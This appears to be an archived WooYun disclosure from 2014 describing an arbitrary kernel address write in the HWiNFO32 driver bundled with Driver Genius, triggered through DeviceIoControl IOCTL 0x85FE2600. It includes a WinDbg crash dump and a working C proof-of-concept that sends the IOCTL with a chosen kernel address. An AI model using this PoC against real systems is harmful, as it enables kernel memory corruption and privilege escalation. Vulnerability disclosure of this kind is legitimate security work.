乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-29: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-12-28: 厂商已经主动忽略漏洞,细节向公众公开
HWiNFO32驱动过滤不严,造成任意地址写固定数据漏洞。驱动精灵中包含HWiNFO32,其名称为Mydriver32.sys
对DeviceIoControl例程中,当IoControlCode=0x85FE2600时,不严格过滤用户传入的 lpOutBuffer参数,直接调用nt!IopfCompleteRequest后,经过一系列处理,最终在nt!IopCompleteRequest产生漏洞,可写任意地址。因其最终引发在nt!IopCompleteRequest,所以也于系统相关经测试xpsp3可正常利用,win7则没有影响。
windbg崩溃信息。
PAGE_FAULT_IN_NONPAGED_AREA (50)Invalid system memory was referenced. This cannot be protected by try-except,it must be protected by a Probe. Typically the address is just plain bad or itis pointing at freed memory.Arguments:Arg1: ffff0000, memory referenced.Arg2: 00000001, value 0 = read operation, 1 = write operation.Arg3: 804ed09b, If non-zero, the instruction address which referenced the bad memory address.Arg4: 00000000, (reserved)Debugging Details:------------------WRITE_ADDRESS: ffff0000 FAULTING_IP: nt!IopCompleteRequest+92804ed09b f3a5 rep movs dword ptr es:[edi],dword ptr [esi]MM_INTERNAL_CODE: 0DEFAULT_BUCKET_ID: CODE_CORRUPTIONBUGCHECK_STR: 0x50PROCESS_NAME: TestMyDriver32_IRP_ADDRESS: 82177f68DEVICE_OBJECT: 81d5f518DRIVER_OBJECT: 81d26288IMAGE_NAME: DgSafe.sysDEBUG_FLR_IMAGE_TIMESTAMP: 540684f3MODULE_NAME: DgSafeFAULTING_MODULE: b1250000 mydrivers32TRAP_FRAME: b137f91c -- (.trap 0xffffffffb137f91c)ErrCode = 00000002eax=00000110 ebx=82177f68 ecx=00000044 edx=00000001 esi=81f24680 edi=ffff0000eip=804ed09b esp=b137f990 ebp=b137f9d4 iopl=0 nv up ei pl nz na pe nccs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206nt!IopCompleteRequest+0x92:804ed09b f3a5 rep movs dword ptr es:[edi],dword ptr [esi]Resetting default scopeLAST_CONTROL_TRANSFER: from 80533797 to 804e450aSTACK_TEXT: b137f46c 80533797 00000003 ffff0000 00000000 nt!RtlpBreakWithStatusInstructionb137f4b8 8053426e 00000003 806f2298 c03fffc0 nt!KiBugCheckDebugBreak+0x19b137f898 8053485e 00000050 ffff0000 00000001 nt!KeBugCheck2+0x574b137f8b8 805251a8 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1bb137f904 804e2747 00000001 ffff0000 00000000 nt!MmAccessFault+0x6f5b137f904 804ed09b 00000001 ffff0000 00000000 nt!KiTrap0E+0xccb137f9d4 804ed11a 82177fa8 b137fa20 b137fa14 nt!IopCompleteRequest+0x92b137fa24 806f2c35 00000000 00000000 b137fa3c nt!KiDeliverApc+0xb3b137fa24 806f2861 00000000 00000000 b137fa3c hal!HalpApcInterrupt+0xc5b137faac 804e63cc 82177fa8 82177f68 00000000 hal!KeReleaseInStackQueuedSpinLock+0x11b137facc 804ed134 82177fa8 81d2d588 00000000 nt!KeInsertQueueApc+0x4bb137fb00 b1251f27 81d2d588 81d26288 82177f68 nt!IopfCompleteRequest+0x1d8WARNING: Stack unwind information not available. Following frames may be wrong.b137fc34 804e4767 81d5f518 82177f68 806f22d0 mydrivers32+0x1f27b137fc44 805692ab 82177fd8 81d2d588 82177f68 nt!IopfCallDriver+0x31b137fc58 805781e2 81d5f518 82177f68 81d2d588 nt!IopSynchronousServiceTail+0x70b137fd00 8057a705 00000054 00000000 00000000 nt!IopXxxControlFile+0x611b137fd34 804df7f8 00000054 00000000 00000000 nt!NtDeviceIoControlFile+0x2ab137fd34 7c92e514 00000054 00000000 00000000 nt!KiSystemServicePostCall0013fed8 7c92d28a 7c801675 00000054 00000000 ntdll!KiFastSystemCallRet0013fedc 7c801675 00000054 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc0013ff3c 00401058 00000054 85fe2600 0013ff68 kernel32!DeviceIoControl+0xdd0013ff68 00401083 00000000 0040302c 78542201 TestMyDriver32_b!TestMyDriver32+0x58 [e:\code_src\c\testmydriver32\testmydriver32\testmydriver32.cpp @ 29]0013ff7c 0040120f 00000001 00033d48 000328b8 TestMyDriver32_b!wmain+0x13 [e:\code_src\c\testmydriver32\testmydriver32\testmydriver32.cpp @ 37]0013ffc0 7c816037 0558ee60 7c92d96e 7ffdf000 TestMyDriver32_b!__tmainCRTStartup+0x10f [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 579]0013fff0 00000000 00401357 00000000 78746341 kernel32!BaseProcessStart+0x23STACK_COMMAND: kbCHKIMG_EXTENSION: !chkimg -lo 50 -d !nt 804df7da-804df7df 6 bytes - nt!KiSystemServiceAccessTeb+2c [ 8b fc f6 45 72 02:e9 ce 15 b5 31 90 ] 80586896-80586899 4 bytes - nt!NtTerminateProcess+4b [ ce f4 fd ff:ad 49 a9 31 ] 806319c6-806319c9 4 bytes - nt!NtTerminateJobObject+2d (+0xab130) [ 9e 43 f3 ff:cd 98 9e 31 ]14 errors : !nt (804df7da-806319c9)FOLLOWUP_NAME: MachineOwnerMEMORY_CORRUPTOR: PATCH_DgSafeFAILURE_BUCKET_ID: MEMORY_CORRUPTION_PATCH_DgSafeBUCKET_ID: MEMORY_CORRUPTION_PATCH_DgSafeFollowup: MachineOwner---------
利用测试代码:
VOID TestMyDriver32(){ HANDLE hCreateFile = INVALID_HANDLE_VALUE; DWORD dwInBuffer = 0x6c77792a; DWORD dwOutBuffer = 0xf8be8020;//内核可写地址请自行更改 hCreateFile = CreateFileA("\\\\.\\HWiNFO32", 0, // no access to the drive FILE_SHARE_READ | // share mode FILE_SHARE_WRITE, NULL, // default security attributes OPEN_EXISTING, // disposition 0, // file attributes NULL); if (hCreateFile == INVALID_HANDLE_VALUE) { printf("Error Open Device!\n"); return ; } DeviceIoControl(hCreateFile, 0x85FE2600, (LPVOID)&dwInBuffer, 4, (LPVOID)dwOutBuffer, 0, &dwInBuffer, NULL); CloseHandle(hCreateFile); return;}int _tmain(int argc, _TCHAR* argv[]){ char cSSS[10]; TestMyDriver32(); scanf("%s",cSSS); return 0;}
开发人员更懂
未能联系到厂商或者厂商积极拒绝